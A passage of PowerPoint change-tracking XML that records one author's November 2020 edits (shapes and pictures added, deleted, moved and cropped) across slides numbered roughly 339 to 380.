        <pc:spChg chg="add mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{9D6A6757-95C0-451B-BD34-2ABD85725987}" dt="2020-11-07T20:36:46.549" v="62" actId="207"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3958300443" sldId="339"/>
            <ac:spMk id="7" creationId="{19DFB444-7E27-4F0D-80C3-BFC84D3A0D99}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:picChg chg="add del mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{9D6A6757-95C0-451B-BD34-2ABD85725987}" dt="2020-11-07T20:32:09.849" v="13" actId="478"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3958300443" sldId="339"/>
            <ac:picMk id="4" creationId="{BA2C98D6-5081-4F65-8E92-79DD2D6D1242}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="add mod modCrop">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{9D6A6757-95C0-451B-BD34-2ABD85725987}" dt="2020-11-07T20:36:24.409" v="59" actId="1076"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3958300443" sldId="339"/>
            <ac:picMk id="5" creationId="{9A1BF9A5-2910-40A4-8A09-83F0318D4B97}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="add mod modCrop">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{9D6A6757-95C0-451B-BD34-2ABD85725987}" dt="2020-11-07T20:36:21.362" v="58" actId="1076"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3958300443" sldId="339"/>
            <ac:picMk id="6" creationId="{CFCA0F0E-F318-4650-9966-7732CB5891C2}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="add mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{9D6A6757-95C0-451B-BD34-2ABD85725987}" dt="2020-11-07T20:39:03.892" v="76" actId="1076"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3958300443" sldId="339"/>
            <ac:picMk id="9" creationId="{396062D2-C6F2-4A88-BA88-353CE05539D0}"/>
          </ac:picMkLst>
        </pc:picChg>
      </pc:sldChg>
      <pc:sldChg chg="addSp delSp modSp new mod delAnim modAnim">
        <pc:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{9D6A6757-95C0-451B-BD34-2ABD85725987}" dt="2020-11-22T17:58:23.729" v="7418"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="3057431200" sldId="340"/>
        </pc:sldMkLst>
        <pc:spChg chg="add mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{9D6A6757-95C0-451B-BD34-2ABD85725987}" dt="2020-11-07T20:38:03.813" v="72" actId="313"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3057431200" sldId="340"/>
            <ac:spMk id="6" creationId="{4CD67CC2-CA5E-497C-87F1-BB0F3B4237DA}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:picChg chg="add mod modCrop">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{9D6A6757-95C0-451B-BD34-2ABD85725987}" dt="2020-11-07T20:37:49.858" v="68" actId="1076"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3057431200" sldId="340"/>
            <ac:picMk id="2" creationId="{C5124D27-1669-4773-81F3-BB18EFE96AFF}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="add mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{9D6A6757-95C0-451B-BD34-2ABD85725987}" dt="2020-11-22T17:58:20.709" v="7417" actId="1076"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3057431200" sldId="340"/>
            <ac:picMk id="3" creationId="{349818F2-CFED-494B-AAF0-473AA850CA0A}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="add">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{9D6A6757-95C0-451B-BD34-2ABD85725987}" dt="2020-11-07T20:37:36.972" v="66" actId="22"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3057431200" sldId="340"/>
            <ac:picMk id="4" creationId="{8AA496DF-B173-42F3-9415-E93922FEBF68}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="add del">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{9D6A6757-95C0-451B-BD34-2ABD85725987}" dt="2020-11-07T20:38:56.160" v="74" actId="21"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3057431200" sldId="340"/>
            <ac:picMk id="7" creationId="{412FB645-0D2D-45A8-9854-7007D15AEE16}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="add del mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{9D6A6757-95C0-451B-BD34-2ABD85725987}" dt="2020-11-22T17:58:10.164" v="7413" actId="478"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3057431200" sldId="340"/>
            <ac:picMk id="8" creationId="{66FCE7BC-1DBB-454F-B209-5749506CF803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09:48:24.521" v="5579"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="1582342444" sldId="341"/>
        </pc:sldMkLst>
        <pc:spChg chg="add mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{9D6A6757-95C0-451B-BD34-2ABD85725987}" dt="2020-11-07T20:41:20.226" v="85" actId="1076"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1582342444" sldId="341"/>
            <ac:spMk id="6" creationId="{3B604F8D-4151-4EEF-977A-F8CAD263A2B4}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:picChg chg="add mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{9D6A6757-95C0-451B-BD34-2ABD85725987}" dt="2020-11-07T20:40:38.811" v="81" actId="1076"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1582342444" sldId="341"/>
            <ac:picMk id="2" creationId="{CE95AE9D-F8AC-4AEE-BCAC-6FFCE209A75C}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="add">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{9D6A6757-95C0-451B-BD34-2ABD85725987}" dt="2020-11-07T20:40:47.573" v="82" actId="22"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1582342444" sldId="341"/>
            <ac:picMk id="4" creationId="{FB1B4691-1368-472C-B534-47087D051505}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="add mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{9D6A6757-95C0-451B-BD34-2ABD85725987}" dt="2020-11-07T20:41:53.218" v="87" actId="1076"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1582342444" sldId="341"/>
            <ac:picMk id="7" creationId="{8876364A-3CFE-4FC7-B438-F63570D05381}"/>
          </ac:picMkLst>
        </pc:picChg>
      </pc:sldChg>
      <pc:sldChg chg="addSp modSp new del mod modClrScheme modShow chgLayout">
        <pc:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{9D6A6757-95C0-451B-BD34-2ABD85725987}" dt="2020-11-21T16:18:38.936" v="6554" actId="47"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="4109732377" sldId="342"/>
        </pc:sldMkLst>
        <pc:spChg chg="add mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{9D6A6757-95C0-451B-BD34-2ABD85725987}" dt="2020-11-15T20:21:11.812" v="5424" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="4109732377" sldId="342"/>
            <ac:spMk id="2" creationId="{5B856AB2-6BA9-4380-86AB-1693066C91AA}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="addSp delSp modSp new mod modClrScheme modAnim chgLayout modNotesTx">
        <pc:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{9D6A6757-95C0-451B-BD34-2ABD85725987}" dt="2020-11-22T18:22:19.422" v="7419"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="1948369255" sldId="343"/>
        </pc:sldMkLst>
        <pc:spChg chg="del">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{9D6A6757-95C0-451B-BD34-2ABD85725987}" dt="2020-11-07T21:08:33.993" v="419" actId="700"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1948369255" sldId="343"/>
            <ac:spMk id="2" creationId="{8C61DE2B-2EE5-4929-A83B-08C2C4546BEC}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add del mod ord">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{9D6A6757-95C0-451B-BD34-2ABD85725987}" dt="2020-11-07T21:38:14.624" v="592" actId="700"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1948369255" sldId="343"/>
            <ac:spMk id="6" creationId="{131489C5-30DB-4493-8C6E-231C0F367C22}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add del mod ord">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{9D6A6757-95C0-451B-BD34-2ABD85725987}" dt="2020-11-07T21:38:14.624" v="592" actId="700"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1948369255" sldId="343"/>
            <ac:spMk id="7" creationId="{F57FE4A8-C85C-46E6-9EC5-35B7CB369AA9}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod ord">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{9D6A6757-95C0-451B-BD34-2ABD85725987}" dt="2020-11-07T21:38:24.477" v="623" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1948369255" sldId="343"/>
            <ac:spMk id="8" creationId="{E6E57A5B-5B0D-4511-A2EA-5E37AD77DD72}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:picChg chg="add mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{9D6A6757-95C0-451B-BD34-2ABD85725987}" dt="2020-11-07T21:38:05.002" v="590" actId="1076"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1948369255" sldId="343"/>
            <ac:picMk id="4" creationId="{645DE994-02AE-4B91-99E3-CFBBC34B32E3}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="add mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{9D6A6757-95C0-451B-BD34-2ABD85725987}" dt="2020-11-07T21:38:01.331" v="589" actId="1036"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1948369255" sldId="343"/>
            <ac:picMk id="5" creationId="{499D0020-DB1C-4A14-B642-5E3918DF5476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719230595" sldId="372"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="delSp modSp add del mod modNotesTx">
        <pc:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{9D6A6757-95C0-451B-BD34-2ABD85725987}" dt="2020-11-15T20:19:26.405" v="5398" actId="47"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="3376229237" sldId="373"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{9D6A6757-95C0-451B-BD34-2ABD85725987}" dt="2020-11-07T20:49:18.978" v="191" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3376229237" sldId="373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3:43:34.948" v="1195" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3376229237" sldId="373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9D6A6757-95C0-451B-BD34-2ABD85725987}" dt="2020-11-07T20:51:19.052" v="261" actId="478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delSp modSp new mod modClrScheme chgLayout modNotesTx">
        <pc:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{9D6A6757-95C0-451B-BD34-2ABD85725987}" dt="2020-11-21T15:13:21.789" v="6082" actId="20577"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="1129994055" sldId="374"/>
        </pc:sldMkLst>
        <pc:spChg chg="add del">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{9D6A6757-95C0-451B-BD34-2ABD85725987}" dt="2020-11-07T21:37:37.948" v="545" actId="478"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1129994055" sldId="374"/>
            <ac:spMk id="3" creationId="{9FEAEC53-E72A-45B1-AB5F-6277870096D5}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{9D6A6757-95C0-451B-BD34-2ABD85725987}" dt="2020-11-07T21:43:15.091" v="678" actId="1076"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1129994055" sldId="374"/>
            <ac:spMk id="5" creationId="{708C272E-B879-4659-A02F-A5997F6834D6}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod ord">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{9D6A6757-95C0-451B-BD34-2ABD85725987}" dt="2020-11-07T21:43:26.147" v="700" actId="1036"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1129994055" sldId="374"/>
            <ac:spMk id="6" creationId="{208DF019-DECD-4F75-AD35-C4C8D49C5CB4}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:picChg chg="add mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{9D6A6757-95C0-451B-BD34-2ABD85725987}" dt="2020-11-07T21:40:58.251" v="670" actId="1076"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1129994055" sldId="374"/>
            <ac:picMk id="7" creationId="{671BD4E5-5920-4A9F-B73D-B72389BDAEDD}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="add mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{9D6A6757-95C0-451B-BD34-2ABD85725987}" dt="2020-11-07T21:42:18.547" v="674" actId="14100"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1129994055" sldId="374"/>
            <ac:picMk id="8" creationId="{D46219C5-A3AF-4ADB-81E7-144A70664B75}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="add mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{9D6A6757-95C0-451B-BD34-2ABD85725987}" dt="2020-11-07T21:42:24.922" v="676" actId="14100"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1129994055" sldId="374"/>
            <ac:picMk id="9" creationId="{E2C4C69B-9366-4362-BE8C-D07FEC59CE09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921772423" sldId="374"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="addSp delSp modSp new mod modClrScheme modAnim chgLayout modNotesTx">
        <pc:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{9D6A6757-95C0-451B-BD34-2ABD85725987}" dt="2020-11-22T18:29:41.494" v="7443" actId="20577"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="3755240379" sldId="375"/>
        </pc:sldMkLst>
        <pc:spChg chg="del">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{9D6A6757-95C0-451B-BD34-2ABD85725987}" dt="2020-11-08T11:31:42.907" v="702" actId="700"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3755240379" sldId="375"/>
            <ac:spMk id="2" creationId="{0BD6E942-C4B9-40CF-9D4E-1896C1404BA4}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{9D6A6757-95C0-451B-BD34-2ABD85725987}" dt="2020-11-08T11:35:14.435" v="945" actId="1076"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3755240379" sldId="375"/>
            <ac:spMk id="4" creationId="{30EA98EE-412C-46E2-88B7-B7FCA3ADF276}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{9D6A6757-95C0-451B-BD34-2ABD85725987}" dt="2020-11-08T11:36:05.155" v="967" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3755240379" sldId="375"/>
            <ac:spMk id="6" creationId="{1A5324ED-6FA8-414B-8D1A-0CE5F9618E1F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948782123" sldId="375"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="addSp modSp new mod modAnim">
        <pc:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{9D6A6757-95C0-451B-BD34-2ABD85725987}" dt="2020-11-22T18:31:06.903" v="7448"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="94239133" sldId="376"/>
        </pc:sldMkLst>
        <pc:spChg chg="add mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{9D6A6757-95C0-451B-BD34-2ABD85725987}" dt="2020-11-08T13:12:23.692" v="1073" actId="1076"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="94239133" sldId="376"/>
            <ac:spMk id="5" creationId="{9CEF7E55-8719-40D6-B1F5-DAB2AD5EAB51}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:picChg chg="add mod modCrop">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{9D6A6757-95C0-451B-BD34-2ABD85725987}" dt="2020-11-08T13:12:18.947" v="1072" actId="1076"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="94239133" sldId="376"/>
            <ac:picMk id="2" creationId="{42A90FFD-AEB3-4A81-BE76-CA63387016E7}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="add mod modCrop">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{9D6A6757-95C0-451B-BD34-2ABD85725987}" dt="2020-11-08T13:12:16.715" v="1071" actId="1076"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="94239133" sldId="376"/>
            <ac:picMk id="3" creationId="{3DFCC7ED-EDDF-4A54-8C95-2BAD39969918}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="add mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{9D6A6757-95C0-451B-BD34-2ABD85725987}" dt="2020-11-08T13:12:12.796" v="1070" actId="14100"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="94239133" sldId="376"/>
            <ac:picMk id="6" creationId="{A18142B4-C17D-41DF-9098-F9EB368FBE09}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="add mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{9D6A6757-95C0-451B-BD34-2ABD85725987}" dt="2020-11-08T13:13:19.739" v="1075" actId="1076"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="94239133" sldId="376"/>
            <ac:picMk id="7" creationId="{FDAD255C-90D1-4E50-88CB-991F1E15B576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997786756" sldId="377"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="addSp modSp new mod modAnim">
        <pc:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{9D6A6757-95C0-451B-BD34-2ABD85725987}" dt="2020-11-22T18:34:57.832" v="7450"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="3159120664" sldId="377"/>
        </pc:sldMkLst>
        <pc:spChg chg="add mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{9D6A6757-95C0-451B-BD34-2ABD85725987}" dt="2020-11-08T13:15:31.443" v="1122" actId="1037"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3159120664" sldId="377"/>
            <ac:spMk id="8" creationId="{D37F242C-5E0F-4D3B-830A-F22ADBD6C5B7}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:picChg chg="add">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{9D6A6757-95C0-451B-BD34-2ABD85725987}" dt="2020-11-08T13:13:34.546" v="1077" actId="22"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3159120664" sldId="377"/>
            <ac:picMk id="3" creationId="{B82A0917-67FB-429A-BD99-B0C3AFD814E6}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="add mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{9D6A6757-95C0-451B-BD34-2ABD85725987}" dt="2020-11-08T13:14:23.060" v="1080" actId="1076"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3159120664" sldId="377"/>
            <ac:picMk id="4" creationId="{6D8DC4F2-1420-40F4-A485-516867A06F74}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="add">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{9D6A6757-95C0-451B-BD34-2ABD85725987}" dt="2020-11-08T13:14:27.383" v="1081" actId="22"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3159120664" sldId="377"/>
            <ac:picMk id="6" creationId="{7DF88DEF-DE69-442C-B8C4-3D6AA47F8503}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="add mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{9D6A6757-95C0-451B-BD34-2ABD85725987}" dt="2020-11-08T13:16:09.940" v="1124" actId="1076"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3159120664" sldId="377"/>
            <ac:picMk id="9" creationId="{FED2FF50-7145-4EF0-BFE0-6FE5373324EC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896242820" sldId="378"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="addSp delSp modSp new mod modClrScheme chgLayout">
        <pc:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{9D6A6757-95C0-451B-BD34-2ABD85725987}" dt="2020-11-22T18:37:45.590" v="7474" actId="14100"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="2225150914" sldId="378"/>
        </pc:sldMkLst>
        <pc:spChg chg="add del mod ord">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{9D6A6757-95C0-451B-BD34-2ABD85725987}" dt="2020-11-08T13:45:07.974" v="1418" actId="700"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2225150914" sldId="378"/>
            <ac:spMk id="2" creationId="{A7D5FE3E-78BE-497A-BA65-36648C0B3257}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod ord">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{9D6A6757-95C0-451B-BD34-2ABD85725987}" dt="2020-11-22T18:36:59.332" v="7459" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2225150914" sldId="378"/>
            <ac:spMk id="3" creationId="{5DD70FC0-8B43-4971-BA8E-417BEE03C24A}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod ord">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{9D6A6757-95C0-451B-BD34-2ABD85725987}" dt="2020-11-22T18:37:45.590" v="7474" actId="14100"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2225150914" sldId="378"/>
            <ac:spMk id="4" creationId="{5999E414-BAA2-463C-AC0F-89D3DCD50E8A}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="modSp add del mod modNotesTx">
        <pc:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{9D6A6757-95C0-451B-BD34-2ABD85725987}" dt="2020-11-15T20:34:54.282" v="5464" actId="47"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="1080642569" sldId="379"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{9D6A6757-95C0-451B-BD34-2ABD85725987}" dt="2020-11-08T13:42:19.019" v="1131" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1080642569" sldId="379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3:44:08.548" v="1230" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1080642569" sldId="379"/>
            <ac:spMk id="4" creationId="{478AB046-1B68-488D-AE60-8F01F95A10E4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173228883" sldId="380"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="addSp delSp modSp new mod modClrScheme modAnim chgLayout">
        <pc:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{9D6A6757-95C0-451B-BD34-2ABD85725987}" dt="2020-11-21T16:55:56.065" v="7293"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="2641667682" sldId="380"/>
        </pc:sldMkLst>
        <pc:spChg chg="del">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{9D6A6757-95C0-451B-BD34-2ABD85725987}" dt="2020-11-08T14:06:22.984" v="1665" actId="700"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2641667682" sldId="380"/>
            <ac:spMk id="2" creationId="{C5B5E038-CCAE-4544-AE73-D91C7475BF4C}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="del">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{9D6A6757-95C0-451B-BD34-2ABD85725987}" dt="2020-11-08T14:06:22.984" v="1665" actId="700"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2641667682" sldId="380"/>
            <ac:spMk id="3" creationId="{85C6A050-00A5-4076-B59E-6245BAFD7FFE}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
